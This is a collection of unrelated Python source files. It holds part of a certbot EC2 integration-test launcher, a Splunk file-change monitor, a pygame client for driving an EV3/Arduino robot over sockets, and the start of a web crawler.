cxn.run('cd %s && sudo docker-compose up -d' % boulder_path)
def config_and_launch_boulder(cxn, instance):
# yes, we're hardcoding the gopath. it's a predetermined AMI.
with cxn.prefix('export GOPATH=/home/ubuntu/gopath'):
deploy_script(cxn, 'scripts/boulder_config.sh')
run_boulder(cxn)
def install_and_launch_certbot(cxn, instance, boulder_url, target, log_dir):
local_repo_to_remote(cxn, log_dir)
# This needs to be like this, I promise. 1) The env argument to run doesn't work.
# See https://github.com/fabric/fabric/issues/1744. 2) prefix() sticks an && between
# the commands, so it needs to be exports rather than no &&s in between for the script subshell.
with cxn.prefix('export BOULDER_URL=%s && export PUBLIC_IP=%s && export PRIVATE_IP=%s && '
'export PUBLIC_HOSTNAME=%s && export PIP_EXTRA_INDEX_URL=%s && '
'export OS_TYPE=%s' %
(boulder_url,
instance.public_ip_address,
instance.private_ip_address,
instance.public_dns_name,
cl_args.alt_pip,
target['type'])):
deploy_script(cxn, cl_args.test_script)
def grab_certbot_log(cxn):
"grabs letsencrypt.log via cat into logged stdout"
cxn.sudo('/bin/bash -l -i -c \'if [ -f "/var/log/letsencrypt/letsencrypt.log" ]; then ' +
'cat "/var/log/letsencrypt/letsencrypt.log"; else echo "[novarlog]"; fi\'')
# fallback file if /var/log is unwriteable...? correct?
cxn.sudo('/bin/bash -l -i -c \'if [ -f ./certbot.log ]; then ' +
'cat ./certbot.log; else echo "[nolocallog]"; fi\'')
def create_client_instance(ec2_client, target, security_group_id, subnet_id):
"""Create a single client instance for running tests."""
if 'machine_type' in target:
machine_type = target['machine_type']
elif target['virt'] == 'hvm':
machine_type = 't2.medium'
else:
# 32 bit systems
machine_type = 'c1.medium'
if 'userdata' in target:
userdata = target['userdata']
else:
userdata = ''
name = 'le-%s'%target['name']
print(name, end=" ")
return make_instance(ec2_client,
name,
target['ami'],
KEYNAME,
machine_type=machine_type,
security_group_id=security_group_id,
subnet_id=subnet_id,
userdata=userdata)
def test_client_process(fab_config, inqueue, outqueue, boulder_url, log_dir):
cur_proc = mp.current_process()
for inreq in iter(inqueue.get, SENTINEL):
ii, instance_id, target = inreq
# Each client process is given its own session due to the suggestion at
# https://boto3.amazonaws.com/v1/documentation/api/latest/guide/resources.html?highlight=multithreading#multithreading-multiprocessing.
aws_session = boto3.session.Session(profile_name=PROFILE)
ec2_client = aws_session.resource('ec2')
instance = ec2_client.Instance(id=instance_id)
#save all stdout to log file
sys.stdout = open(log_dir+'/'+'%d_%s.log'%(ii,target['name']), 'w')
print("[%s : client %d %s %s]" % (cur_proc.name, ii, target['ami'], target['name']))
instance = block_until_instance_ready(instance)
print("server %s at %s"%(instance, instance.public_ip_address))
host_string = "%s@%s"%(target['user'], instance.public_ip_address)
print(host_string)
with Connection(host_string, config=fab_config) as cxn:
try:
install_and_launch_certbot(cxn, instance, boulder_url, target, log_dir)
outqueue.put((ii, target, Status.PASS))
print("%s - %s SUCCESS"%(target['ami'], target['name']))
except:
outqueue.put((ii, target, Status.FAIL))
print("%s - %s FAIL"%(target['ami'], target['name']))
traceback.print_exc(file=sys.stdout)
pass
# append server certbot.log to each per-machine output log
print("\n\ncertbot.log\n" + "-"*80 + "\n")
try:
grab_certbot_log(cxn)
except:
print("log fail\n")
traceback.print_exc(file=sys.stdout)
pass
def cleanup(cl_args, instances, targetlist, boulder_server, log_dir):
print('Logs in ', log_dir)
# If lengths of instances and targetlist aren't equal, instances failed to
# start before running tests so leaving instances running for debugging
# isn't very useful. Let's cleanup after ourselves instead.
if len(instances) != len(targetlist) or not cl_args.saveinstances:
print('Terminating EC2 Instances')
if cl_args.killboulder:
boulder_server.terminate()
for instance in instances:
instance.terminate()
else:
# print login information for the boxes for debugging
for ii, target in enumerate(targetlist):
print(target['name'],
target['ami'],
"%s@%s"%(target['user'], instances[ii].public_ip_address))
def main():
# Fabric library controlled through global env parameters
fab_config = Config(overrides={
"connect_kwargs": {
"key_filename": [KEYFILE], # https://github.com/fabric/fabric/issues/2007
},
"run": {
"echo": True,
"pty": True,
},
"timeouts": {
"connect": 10,
},
})
# no network connection, so don't worry about closing this one.
local_cxn = Connection('localhost', config=fab_config)
# Set up local copy of git repo
#-------------------------------------------------------------------------------
log_dir = "letest-%d"%int(time.time()) #points to logging / working directory
print("Making local dir for test repo and logs: %s"%log_dir)
local_cxn.local('mkdir %s'%log_dir)
try:
# figure out what git object to test and locally create it in log_dir
print("Making local git repo")
if cl_args.pull_request != '~':
print('Testing PR %s ' % cl_args.pull_request,
"MERGING into master" if cl_args.merge_master else "")
local_git_PR(local_cxn, cl_args.repo, cl_args.pull_request, log_dir,
cl_args.merge_master)
elif cl_args.branch != '~':
print('Testing branch %s of %s' % (cl_args.branch, cl_args.repo))
local_git_branch(local_cxn, cl_args.repo, cl_args.branch, log_dir)
else:
print('Testing current branch of %s' % cl_args.repo, log_dir)
local_git_clone(local_cxn, cl_args.repo, log_dir)
except BaseException:
print("FAIL: trouble with git repo")
traceback.print_exc()
exit(1)
# Set up EC2 instances
#-------------------------------------------------------------------------------
configdata = yaml.safe_load(open(cl_args.config_file, 'r'))
targetlist = configdata['targets']
print('Testing against these images: [%d total]'%len(targetlist))
for target in targetlist:
print(target['ami'], target['name'])
print("Connecting to EC2 using\n profile %s\n keyname %s\n keyfile %s"%(PROFILE, KEYNAME, KEYFILE))
aws_session = boto3.session.Session(profile_name=PROFILE)
ec2_client = aws_session.resource('ec2')
print("Determining Subnet")
for subnet in ec2_client.subnets.all():
if should_use_subnet(subnet):
subnet_id = subnet.id
vpc_id = subnet.vpc.id
break
else:
print("No usable subnet exists!")
print("Please create a VPC with a subnet named {0}".format(SUBNET_NAME))
print("that maps public IPv4 addresses to instances launched in the subnet.")
sys.exit(1)
print("Making Security Group")
vpc = ec2_client.Vpc(vpc_id)
sg_exists = False
for sg in vpc.security_groups.all():
if sg.group_name == SECURITY_GROUP_NAME:
security_group_id = sg.id
sg_exists = True
print(" %s already exists"%SECURITY_GROUP_NAME)
if not sg_exists:
security_group_id = make_security_group(vpc).id
time.sleep(30)
boulder_preexists = False
boulder_servers = ec2_client.instances.filter(Filters=[
{'Name': 'tag:Name', 'Values': ['le-boulderserver']},
{'Name': 'instance-state-name', 'Values': ['running']}])
boulder_server = next(iter(boulder_servers), None)
print("Requesting Instances...")
if boulder_server:
print("Found existing boulder server:", boulder_server)
boulder_preexists = True
else:
print("Can't find a boulder server, starting one...")
boulder_server = make_instance(ec2_client,
'le-boulderserver',
BOULDER_AMI,
KEYNAME,
machine_type='t2.micro',
#machine_type='t2.medium',
security_group_id=security_group_id,
subnet_id=subnet_id)
instances = []
try:
if not cl_args.boulderonly:
print("Creating instances: ", end="")
for target in targetlist:
instances.append(
create_client_instance(ec2_client, target,
security_group_id, subnet_id)
)
print()
# Configure and launch boulder server
#-------------------------------------------------------------------------------
print("Waiting on Boulder Server")
boulder_server = block_until_instance_ready(boulder_server)
print(" server %s"%boulder_server)
# host_string defines the ssh user and host for connection
host_string = "ubuntu@%s"%boulder_server.public_ip_address
print("Boulder Server at (SSH):", host_string)
if not boulder_preexists:
print("Configuring and Launching Boulder")
with Connection(host_string, config=fab_config) as boulder_cxn:
config_and_launch_boulder(boulder_cxn, boulder_server)
# blocking often unnecessary, but cheap EC2 VMs can get very slow
block_until_http_ready('http://%s:4000'%boulder_server.public_ip_address,
wait_time=10, timeout=500)
boulder_url = "http://%s:4000/directory"%boulder_server.private_ip_address
print("Boulder Server at (public ip): http://%s:4000/directory"%boulder_server.public_ip_address)
print("Boulder Server at (EC2 private ip): %s"%boulder_url)
if cl_args.boulderonly:
sys.exit(0)
# Install and launch client scripts in parallel
#-------------------------------------------------------------------------------
print("Uploading and running test script in parallel: %s"%cl_args.test_script)
print("Output routed to log files in %s"%log_dir)
# (Advice: always use Manager.Queue, never regular multiprocessing.Queue
# the latter has implementation flaws that deadlock it in some circumstances)
manager = Manager()
outqueue = manager.Queue()
inqueue = manager.Queue()
# launch as many processes as clients to test
num_processes = len(targetlist)
jobs = [] #keep a reference to current procs
# initiate process execution
client_process_args=(fab_config, inqueue, outqueue, boulder_url, log_dir)
for i in range(num_processes):
p = mp.Process(target=test_client_process, args=client_process_args)
jobs.append(p)
p.daemon = True # kills subprocesses if parent is killed
p.start()
# fill up work queue
for ii, target in enumerate(targetlist):
inqueue.put((ii, instances[ii].id, target))
# add SENTINELs to end client processes
for i in range(num_processes):
inqueue.put(SENTINEL)
print('Waiting on client processes', end='')
for p in jobs:
while p.is_alive():
p.join(5 * 60)
# Regularly print output to keep Travis happy
print('.', end='')
sys.stdout.flush()
print()
# add SENTINEL to output queue
outqueue.put(SENTINEL)
# clean up
local_repo_clean(local_cxn, log_dir)
# print and save summary results
results_file = open(log_dir+'/results', 'w')
outputs = [outq for outq in iter(outqueue.get, SENTINEL)]
outputs.sort(key=lambda x: x[0])
failed = False
for outq in outputs:
ii, target, status = outq
if status == Status.FAIL:
failed = True
print('%d %s %s'%(ii, target['name'], status))
results_file.write('%d %s %s\n'%(ii, target['name'], status))
if len(outputs) != num_processes:
failed = True
failure_message = 'FAILURE: Some target machines failed to run and were not tested. ' +\
'Tests should be rerun.'
print(failure_message)
results_file.write(failure_message + '\n')
results_file.close()
if failed:
sys.exit(1)
finally:
cleanup(cl_args, instances, targetlist, boulder_server, log_dir)
if __name__ == '__main__':
main()
|
file_monitor.py
|
#
# Copyright 2021 Splunk Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
This module contains file monitoring class that can be used to check files
change periodically and call callback function to handle properly when
detecting files change.
"""
import logging
import os.path as op
import threading
import time
import traceback
__all__ = ["FileChangesChecker", "FileMonitor"]
class FileChangesChecker:
"""Files change checker.
:param callback: Callback function for files change.
:param files: Files to be monidtored with full path.
:type files: ``list, tuple``
"""
def __init__(self, callback, files):
self._callback = callback
self._files = files
self.file_mtimes = {file_name: None for file_name in self._files}
for k in self.file_mtimes:
try:
self.file_mtimes[k] = op.getmtime(k)
except OSError:
logging.debug("Getmtime for %s, failed: %s", k, traceback.format_exc())
def check_changes(self):
"""Check files change.
If some files are changed and callback function is not None, call
callback function to handle files change.
:returns: True if files changed else False
:rtype: ``bool``
"""
logging.debug("Checking files=%s", self._files)
file_mtimes = self.file_mtimes
changed_files = []
for f, last_mtime in list(file_mtimes.items()):
try:
current_mtime = op.getmtime(f)
if current_mtime != last_mtime:
file_mtimes[f] = current_mtime
changed_files.append(f)
logging.info("Detect %s has changed", f)
except OSError:
pass
if changed_files:
if self._callback:
self._callback(changed_files)
return True
return False
class FileMonitor:
"""Files change monitor.
Monitor files change in a separated thread and call callback
when there is files change.
:param callback: Callback for handling files change.
:param files: Files to monitor.
:type files: ``list, tuple``
:param interval: Interval to check files change.
Usage::
>>> import splunksolutionlib.file_monitor as fm
>>> fm = fm.FileMonitor(fm_callback, files_list, 5)
>>> fm.start()
"""
def __init__(self, callback, files, interval=1):
self._checker = FileChangesChecker(callback, files)
self._thr = threading.Thread(target=self._do_monitor)
self._thr.daemon = True
self._interval = interval
self._started = False
def start(self):
"""Start file monitor.
Start a background thread to monitor files change.
"""
if self._started:
return
self._started = True
self._thr.start()
def stop(self):
"""Stop file monitor.
Stop the background thread to monitor files change.
"""
self._started = False
def _do_monitor(self):
while self._started:
self._checker.check_changes()
for _ in range(self._interval):
if not self._started:
break
time.sleep(1)
|
ev3client.py
|
#!/usr/bin/python3.4
# @file ev3client.py
# @author Pavel Cherezov (cherezov.pavel@gmail.com)
import io
import os
import sys
import time
import pygame
import socket
import threading
import queue
import select
from urllib.request import urlopen
__version__ = '0.5'
import configparser
config = configparser.ConfigParser()
config.read('ev3client.cfg')
ARDUINO_CMD = 'arduino'
EV3_CMD = 'ev3'
mr3020Cfg = config['mr3020-board']
GATE_IP = mr3020Cfg['ip']
GATE_PORT = int(mr3020Cfg['arduino-port'])
EV3_PORT = int(mr3020Cfg['ev3-port'])
frameCfg = config['camera-frame']
CAMERA_URL_FORMAT = frameCfg['camera-url']
FRAME_PORT = int(frameCfg['port'])
FRAME_SIZE = (int(frameCfg['width']), int(frameCfg['height'])) # must be synced with web camera settings
FRAME_POS = (int(frameCfg['pos-x']), int(frameCfg['pos-y']))
windowCfg = config['window']
SCREEN_SIZE = (int(windowCfg['width']), int(windowCfg['height']))
IMG_FOLDER = windowCfg['img-path']
TXT_X = FRAME_POS[0] + FRAME_SIZE[0] + 50
settingsCfg = config['settings']
LOW_POWER = float(settingsCfg['battery-warn'])
ALIVE_SEC = float(settingsCfg['ping-warn'])
MIN_DISTANCE = float(settingsCfg['distance-warn'])
RED = pygame.Color(settingsCfg['warn-color'])
GREEN = pygame.Color('green')
BLACK = pygame.Color('black')
LIGHT_GREEN = pygame.Color(95, 190, 190)
def log(msg):
if not msg.strip():
return
with open('log.txt', 'a') as f:
f.write(msg)
f.write('\n')
class WebFrame:
def __init__(self, ip, port):
self.ip = ip
self.port = port
# Show noise in case of errors
frame = pygame.image.load(os.path.join(IMG_FOLDER, 'noise.jpg'))
self.__noiseFrame = pygame.transform.scale(frame, FRAME_SIZE)
frame = pygame.image.load(os.path.join(IMG_FOLDER, 'noise_black.jpg'))
self.__noiseBlackFrame = pygame.transform.scale(frame, FRAME_SIZE)
self.__frame = self.__noiseFrame
self.started = True
self.__thread = threading.Thread(target=self.frameLoop)
self.__thread.daemon = True
self.__thread.start()
def __getFrame(self):
try:
frame_url = CAMERA_URL_FORMAT.format(self.ip, self.port)
image_str = urlopen(frame_url).read()
image_file = io.BytesIO(image_str)
frame = pygame.image.load(image_file)
return frame
except:
pass
# Show noise in case of errors
return self.__noiseFrame if int(time.time()) % 2 == 0 else self.__noiseBlackFrame
def frameLoop(self):
while self.started:
self.__frame = self.__getFrame()
time.sleep(0.5)
def getFrame(self):
return self.__frame
def stop(self):
self.started = False
#self.__thread.join()
class Cmd:
KeyValDelimiter = ':'
def __init__(self, cmd, value, dest = None):
self.cmd = cmd
self.value = value
self.dest = dest
@staticmethod
def parse(raw):
if Cmd.KeyValDelimiter not in raw:
return Cmd(None, None, None)
return Cmd(*raw.split(Cmd.KeyValDelimiter)[:2])
def __repr__(self):
return '{}{}{};'.format(self.cmd, Cmd.KeyValDelimiter, self.value)
def __eq__(self, c):
return (self.cmd == c.cmd) and (self.value == c.value)
class CmdTransport:
def __init__(self, ip, port, ev3port):
self.ip = ip
self.port = port
self.ev3port = ev3port
self.__queue = queue.Queue()
self.in_queue = queue.Queue()
self.__socket = None
#self.__prevCmd = None
self.__lastReconnect = None
self.started = True
self.__thread = threading.Thread(target=self.__processLoop)
self.__thread.daemon = True
self.__thread.start()
self.__pingThread = threading.Thread(target=self.__pingThread)
self.__pingThread.daemon = True
self.__pingThread.start()
def __pingThread(self):
while self.started:
ping = Cmd('ping', 'ping', EV3_CMD);
self.send(ping)
time.sleep(ALIVE_SEC - 1)
def isReady(self):
return self.__socket is not None
def send(self, cmd):
#if cmd == self.__prevCmd:
# return
self.__queue.put_nowait(cmd)
#self.__prevCmd = cmd
def reconnectEv3(self):
if time.time() - self.__lastReconnect > 10:
print('reconnection..')
self.__ev3socket = self.__connect(self.ev3port)
def __processLoop(self):
self.__socket = self.__connect(self.port)
self.__ev3socket = self.__connect(self.ev3port)
if self.__socket is None:
return
while self.started:
try:
cmd = self.__queue.get_nowait()
cmds = str(cmd)
if cmd.dest is None or cmd.dest == ARDUINO_CMD:
r, w, x = select.select([self.__socket], [self.__socket], [], 1)
if self.__socket in r:
data = self.__socket.recv(128).decode()
self.in_queue.put(data)
if self.__socket in w:
print('senging to ardu:', cmds)
self.__socket.sendall(cmds.encode())
time.sleep(0.1)
if cmd.dest is None or cmd.dest == EV3_CMD:
r, w, x = select.select([self.__ev3socket], [self.__ev3socket], [self.__ev3socket], 1)
if self.__ev3socket in r:
data = self.__ev3socket.recv(128).decode()
self.in_queue.put(data)
if self.__ev3socket in w:
print('senging to ev3:', cmds)
self.__ev3socket.sendall(cmds.encode())
time.sleep(0.1)
except queue.Empty:
pass
except Exception as e:
print(e)
def __connect(self, port):
try:
self.__lastReconnect = time.time()
print('Connecting to {}:{}', self.ip, port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_TCP, socket.TCP_NODELAY, 1)
s.connect((self.ip, port))
return s
except Exception as e:
print(e)
return None
def stop(self):
self.started = False
#self.__thread.join()
class Joystick:
def __init__(self):
self.__joystick = None
self.__prev_x = 0
self.__prev_y = 0
self.__initJoiystick()
def __initJoiystick(self):
pygame.joystick.init()
if pygame.joystick.get_count() == 0:
return
joystickId = 0
self.__joystick = pygame.joystick.Joystick(joystickId)
self.__joystick.init()
def isReady(self):
return self.__joystick is not None
def read(self):
data = []
if self.__joystick is None:
return data
axes = self.__joystick.get_numaxes()
x = self.__joystick.get_axis(0)
y = self.__joystick.get_axis(1)
x = int(x * 100) / 10
y = int(y * 100) / 10
if abs(x) < 2:
x = 0
if abs(y) < 2:
y = 0
if self.__prev_x != x or self.__prev_y != y:
data.append(Cmd('xy', '{};{}'.format(x, y)))
self.__prev_x = x
self.__prev_y = y
buttons = self.__joystick.get_numbuttons()
for i in range( buttons ):
if i == 0:
button = self.__joystick.get_button( i )
if button == 1:
with open('say') as f:
l = f.readline()
data.append(Cmd('speak', l))
if i == 1:
button = self.__joystick.get_button( i )
if button == 1:
data.append(Cmd('get', 'in'))
elif button == 0:
data.append(Cmd('get', 'out'))
return data
def sumd(e1, e2):
return [e1[i] + e2[i] for i in range(len(e1))]
def text_objects(text, font):
textSurface = font.render(text, True, BLACK)
return textSurface, textSurface.get_rect()
class RoboControl:
def __init__(self):
pygame.init()
pygame.key.set_repeat(1, 100)
self.__webFrame = None
self.__cmdTransport = None
self.__joystick = None
self.__screen = None
self.__clock = pygame.time.Clock()
self.__font = pygame.font.SysFont('Arial', 25)
self.__last_ir_value= 0
self.__last_ping_time = 0
self.__last_power_value = 0
frame = pygame.image.load(os.path.join(IMG_FOLDER, 'cam.png'))
self.__camViewFrame = pygame.transform.scale(frame, (100, 100))
self.__gear = 1
def run(self, joystick = Joystick):
self.__initScreen()
#self.__joystick = joystick()
self.__webFrame = WebFrame(GATE_IP, FRAME_PORT)
self.__cmdTransport = CmdTransport(GATE_IP, GATE_PORT, EV3_PORT)
self.__arm1 = 100
cmd = Cmd('Arm1', self.__arm1)
self.__cmdTransport.send(cmd)
self.__arm2 = 0
self.__cam = 0
cmd = Cmd('Arm2', self.__arm2)
self.__cmdTransport.send(cmd)
self.__arm2 = 0
self.__cam = 0
cmd = Cmd('Arm2', self.__arm2)
self.__cmdTransport.send(cmd)
self.__gear = 1
cmd = Cmd('gear', '10', EV3_CMD)
self.__cmdTransport.send(cmd)
self.__loop()
def __txtRow(self, render, row):
hrow = 50
self.__screen.blit(render, (TXT_X, FRAME_POS[1] + hrow * (row - 1)))
def __initScreen(self):
self.__screen = pygame.display.set_mode(SCREEN_SIZE)
pygame.display.set_caption('Legowrt v.{}'.format(__version__))
ico = pygame.image.load(os.path.join(IMG_FOLDER, 'icon.jpg'))
pygame.display.set_icon(ico)
self.__bkgnd_img = pygame.image.load(os.path.join(IMG_FOLDER, 'frame.jpg'))
def __dispatchResponse(self):
while not self.__cmdTransport.in_queue.empty():
data = self.__cmdTransport.in_queue.get_nowait()
for raw_cmd in data.split(';'):
cmd = Cmd.parse(raw_cmd)
if cmd.cmd == 'ir':
self.onIR(cmd)
elif cmd.cmd == 'ping':
self.onPing(cmd)
elif cmd.cmd == 'power':
self.onPower(cmd)
def onPing(self, cmd):
self.__last_ping_time = time.time()
def onIR(self, cmd):
self.__last_ir_value = cmd.value
def onPower(self, cmd):
self.__last_power_value = cmd.value
def __handlePing(self):
alive = time.time() - self.__last_ping_time < ALIVE_SEC
txt = 'Brick connection lost'
color = RED if int(time.time()) % 2 == 0 else BLACK
if alive:
txt = 'Brick Connected'
color = LIGHT_GREEN
else:
self.__cmdTransport.reconnectEv3()
self.__last_ir_value = '0'
render = self.__font.render(txt, True, color)
self.__txtRow(render, row=3)
def __handleArm(self):
txt = 'Arm: {}/{}'.format(self.__arm1, self.__arm2)
color = LIGHT_GREEN
render = self.__font.render(txt, True, color)
self.__txtRow(render, row=7)
def __handleCam(self):
txt = 'Camera view'
color = LIGHT_GREEN
render = self.__font.render(txt, True, color)
self.__txtRow(render, row=4)
def __handleGear(self):
txt = 'Gear: {}'.format(self.__gear)
color = LIGHT_GREEN
render = self.__font.render(txt, True, color)
self.__txtRow(render, row=8)
def __handlePower(self):
try:
val = float(self.__last_power_value)
except:
return
ok = val > LOW_POWER
txt = 'Low battery {:.2f}V'.format(val)
color = RED if int(time.time()) % 2 == 0 else BLACK
if ok:
txt = 'Battery {:.2f}V'.format(val)
color = LIGHT_GREEN
render = self.__font.render(txt, True, color)
self.__txtRow(render, row=2)
def __joysticStatus(self):
ok = self.__joystick.isReady()
txt = 'Joystick disconnected'
color = RED
if ok:
txt = 'Joystick ready'
color = LIGHT_GREEN
render = self.__font.render(txt, True, color)
self.__txtRow(render, row=4)
def __handleDistance(self):
try:
val = int(self.__last_ir_value)
except:
return
color = LIGHT_GREEN if val > MIN_DISTANCE else RED
dist = int(val / 10) * '='
render = self.__font.render('{} {}>|'.format(val, dist), True, color)
self.__txtRow(render, row=10)
def button(self, msg, x, y, w, h, ic, ac, action = None):
mouse = pygame.mouse.get_pos()
click = pygame.mouse.get_pressed()
if x+w > mouse[0] > x and y+h > mouse[1] > y:
pygame.draw.rect(self.__screen, ac,(x,y,w,h))
if click[0] == 1 and action != None:
action()
else:
pygame.draw.rect(self.__screen, ic,(x,y,w,h))
smallText = pygame.font.SysFont("comicsansms", 20)
textSurf, textRect = text_objects(msg, smallText)
textRect.center = ((x+(w/2)), (y+(h/2)) )
self.__screen.blit(textSurf, textRect)
def camView(self):
frame = pygame.transform.rotate(self.__camViewFrame, self.__cam)
self.__screen.blit(frame, (900, 300))
def closeArm(self):
self.__arm2 = 0
arm2 = Cmd('arm2', self.__arm2, ARDUINO_CMD)
self.__cmdTransport.send(arm2)
self.__arm1 = 180
arm1 = Cmd('arm1', self.__arm1, ARDUINO_CMD)
self.__cmdTransport.send(arm1)
def demo(self):
cmd = [Cmd('speak', 'Hello, I am Curiosity mars rover', EV3_CMD),
Cmd('speak', 'Drive forward', EV3_CMD),
Cmd('drive', '0.3,0.3', EV3_CMD),
Cmd('speak', 'Drive backward', EV3_CMD),
Cmd('drive', '-0.3,-0.3', EV3_CMD),
Cmd('speak', 'Stop', EV3_CMD),
Cmd('drive', '0,0', EV3_CMD),
Cmd('speak', 'Left', EV3_CMD),
Cmd('turn', '-30', ARDUINO_CMD),
Cmd('speak', 'Right', EV3_CMD),
Cmd('turn', '30', ARDUINO_CMD),
Cmd('speak', 'Forward', EV3_CMD),
Cmd('turn', '0', ARDUINO_CMD),
Cmd('speak', 'Laser on', EV3_CMD),
Cmd('laser', '1', ARDUINO_CMD),
Cmd('speak', 'Laser off', EV3_CMD),
Cmd('laser', '0', ARDUINO_CMD),
Cmd('speak', 'Hand close', EV3_CMD),
Cmd('arm1', '170', ARDUINO_CMD),
Cmd('arm2', '5', ARDUINO_CMD),
Cmd('arm1', '90', ARDUINO_CMD),
Cmd('arm2', '160', ARDUINO_CMD),
Cmd('speak', 'Camera left', EV3_CMD),
Cmd('cam', '-45', ARDUINO_CMD),
Cmd('speak', 'Camera right', EV3_CMD),
Cmd('cam', '45', ARDUINO_CMD),
Cmd('speak', 'Camera forward', EV3_CMD),
Cmd('cam', '0', ARDUINO_CMD),
]
for c in cmd:
self.__cmdTransport.send(c)
pygame.display.flip()
time.sleep(2)
#self.__arm2 = 0
#arm2 = Cmd('arm2', self.__arm2, ARDUINO_CMD)
#self.__cmdTransport.send(arm2)
#self.__arm1 = 180
#arm1 = Cmd('arm1', self.__arm1, ARDUINO_CMD)
#self.__cmdTransport.send(arm1)
def shutdownBrick(self):
cmd = Cmd('shutdown', 1, EV3_CMD)
self.__cmdTransport.send(cmd)
def __loop(self):
ctrl = False
while True:
self.__screen.blit(self.__bkgnd_img, (0, 0))
frame = self.__webFrame.getFrame()
self.__screen.blit(frame, FRAME_POS)
self.camView()
self.__handleArm()
self.__handleCam()
self.__dispatchResponse()
self.__handleDistance()
self.__handlePing()
self.__handlePower()
self.__handleGear()
#self.__joysticStatus()
self.button('Close arm', 790, 100, 100, 30, GREEN, LIGHT_GREEN, self.closeArm)
self.button('Demo', 900, 100, 100, 30, GREEN, LIGHT_GREEN, self.demo)
self.button('Shutdown', 1010, 100, 100, 30, RED, RED, self.shutdownBrick)
if self.__arm1 < 85:
self.__arm1 = 85
if self.__arm1 > 170:
self.__arm1 = 170
if self.__arm2 < 5:
self.__arm2 = 5
if self.__arm2 > 175:
self.__arm2 = 175
if self.__cam < -85:
self.__cam = -85
if self.__cam > 85:
self.__cam = 85
cmd = None
for event in pygame.event.get():
if event.type == pygame.QUIT:
self.__webFrame.stop()
self.__cmdTransport.stop()
sys.exit()
elif event.type == pygame.KEYUP:
if event.key in [pygame.K_LEFT, pygame.K_RIGHT] and \
(not pygame.key.get_mods() & pygame.KMOD_CTRL) and \
(not pygame.key.get_mods() & pygame.KMOD_ALT):
cmd = Cmd('turn', 0, ARDUINO_CMD)
elif event.key == pygame.K_SPACE:
self.__laser = 0
cmd = Cmd('laser', self.__laser, ARDUINO_CMD)
elif event.key == pygame.K_UP:
cmd = Cmd('drive', '0,0', EV3_CMD)
elif event.key == pygame.K_DOWN:
cmd = Cmd('drive', '0,0', EV3_CMD)
elif event.key == pygame.K_1:
self.__gear = 1
cmd = Cmd('gear', '10', EV3_CMD)
elif event.key == pygame.K_2:
self.__gear = 2
cmd = Cmd('gear', '7', EV3_CMD)
elif event.key == pygame.K_3:
self.__gear = 3
cmd = Cmd('gear', '5', EV3_CMD)
elif event.key == pygame.K_4:
self.__gear = 4
cmd = Cmd('gear', '3', EV3_CMD)
elif event.key == pygame.K_5:
self.__gear = 5
cmd = Cmd('gear', '1', EV3_CMD)
elif event.type in [pygame.KEYDOWN]:
if event.key == pygame.K_ESCAPE:
self.__webFrame.stop()
self.__cmdTransport.stop()
sys.exit()
elif event.key == pygame.K_SPACE:
self.__laser = 1
cmd = Cmd('laser', self.__laser, ARDUINO_CMD)
elif pygame.key.get_mods() & pygame.KMOD_CTRL:
if event.key == pygame.K_LEFT:
self.__arm1 -= 5
cmd = Cmd('arm1', self.__arm1, ARDUINO_CMD)
elif event.key == pygame.K_RIGHT:
self.__arm1 += 5
cmd = Cmd('arm1', self.__arm1, ARDUINO_CMD)
elif event.key == pygame.K_UP:
self.__arm2 -= 5
cmd = Cmd('arm2', self.__arm2, ARDUINO_CMD)
elif event.key == pygame.K_DOWN:
self.__arm2 += 5
cmd = Cmd('arm2', self.__arm2, ARDUINO_CMD)
elif pygame.key.get_mods() & pygame.KMOD_ALT:
if event.key == pygame.K_LEFT:
self.__cam += 5
cmd = Cmd('cam', self.__cam, ARDUINO_CMD)
elif event.key == pygame.K_RIGHT:
self.__cam -= 5
cmd = Cmd('cam', self.__cam, ARDUINO_CMD)
else:
if event.key == pygame.K_LEFT:
cmd = Cmd('turn', -30, ARDUINO_CMD)
if event.key == pygame.K_RIGHT:
cmd = Cmd('turn', 30, ARDUINO_CMD)
if event.key == pygame.K_UP:
cmd = Cmd('drive', '0.3,0.3', EV3_CMD)
if event.key == pygame.K_DOWN:
cmd = Cmd('drive', '-0.3,-0.3', EV3_CMD)
if cmd is not None:
self.__cmdTransport.send(cmd)
#data = self.__joystick.read()
#for cmd in data:
# self.__cmdTransport.send(cmd)
pygame.display.flip()
self.__clock.tick(60)
if __name__ == '__main__':
import sys
c = RoboControl()
class JoystickTest:
def __init__(self):
pass
def isReady(self):
return True
def read(self):
return [Cmd('test', 'test')]
c.run(JoystickTest)
|
core.py
|
import os
import time
import queue
import re
import threading
import copy
from collections import OrderedDict
import requests
import lxml.html
import multiprocessing
from .helpers import color_logging
from .url_queue import UrlQueue
from . import helpers
import csv
import requests
from os import path
from bs4 import BeautifulSoup
from urlparse import urlparse
import re
import robotparser
def parse_seeds(seeds):
""" parse website seeds.
@params
seeds example:
- url1
- user1:pwd1@url1
- user1:pwd1@url1|url2|user3:pwd3@url3
"""
seeds = seeds.strip().split('|')
website_list = []
for seed in seeds:
if '@' not in seed:
website = {
'url': seed,
'auth': None
}
else:
user_pwd, url = seed.split('@')
username, password = user_pwd.split(':')
website = {
'url': url,
'auth': (username, password)
}
website_list.append(website)
return website_list
class WebCrawler(object):
def __init__(self, seeds, include_hosts, logs_folder, config_file=None, respect_robots=True):
self.website_list = parse_seeds(seeds)
self.include_hosts_set = set(include_hosts)
self.test_counter = 0
self.url_queue = UrlQueue()
self.cookie_str = ''
self.auth_dict = {}
self.logs_folder = logs_folder
for website in self.website_list:
website_url = website['url']
host = helpers.get_parsed_object_from_url(website_url).netloc
self.include_hosts_set.add(host)
if website['auth']:
self.auth_dict[host] = website['auth']
self.load_config(config_file)
self.categorised_urls = {}
self.web_urls_mapping = {}
self.bad_urls_mapping = {}
self.current_depth_unvisited_urls_queue = queue.Queue()
#Add robots parser
try:
self.respect_robots = respect_robots
self.rp = robotparser.RobotFileParser()
self.rp.set_url(seeds + "/robots.txt")
self.rp.read()
except IOError, e:
self.respect_robots = False
def reset_all(self):
self.current_depth = 0
self.current_depth_unvisited_urls_queue.queue.clear()
self.url_queue.clear_unvisited_urls()
for website in self.website_list:
website_url = website['url']
